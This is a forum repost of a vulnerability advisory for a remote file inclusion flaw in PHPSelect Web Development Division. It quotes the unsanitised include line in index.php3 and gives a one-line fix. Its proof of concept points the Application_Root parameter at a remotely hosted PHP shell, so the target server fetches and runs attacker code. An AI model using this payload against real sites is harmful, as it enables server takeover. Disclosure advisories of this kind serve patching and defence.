Jump to content
Ras

PHPSelect Web Development Division <= RFI

Recommended Posts



+-------------------------------------------------------------------
+ PHPSelect Web Development Division <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: PHPSelect Web Development Division
+ Venedor ...........: [url]http://www.phpselect.com/[/url]
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: rUnViRuS
+ Original advisory .: [url]http://www.wdzone.net/[/url] [url]http://www.worlddefacers.de/[/url]
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+
+ Code index.php3:
+
+ .....
+ include("$Application_Root/modules/include/global_settings");
+ .....
+
+--------------------------------------------------------------------
+
+ $Application_Root is not properly sanitized before being used.
+ The bug is in the "PDD" Package for PHPSelect Web Development Division.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Add this line to your php-file:
+
+ $Application_Root ="user/dir" //Your root path
+
+--------------------------------------------------------------------
+ PoC:
+ Place a PHPShell on a remote location:
+ [url]http://wdzone.net/sh.txt?[/url]
+
+
[url]http://[target]/index.php3?Application_Root=http://phpshell[/url]
+
+--------------------------------------------------------------------

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...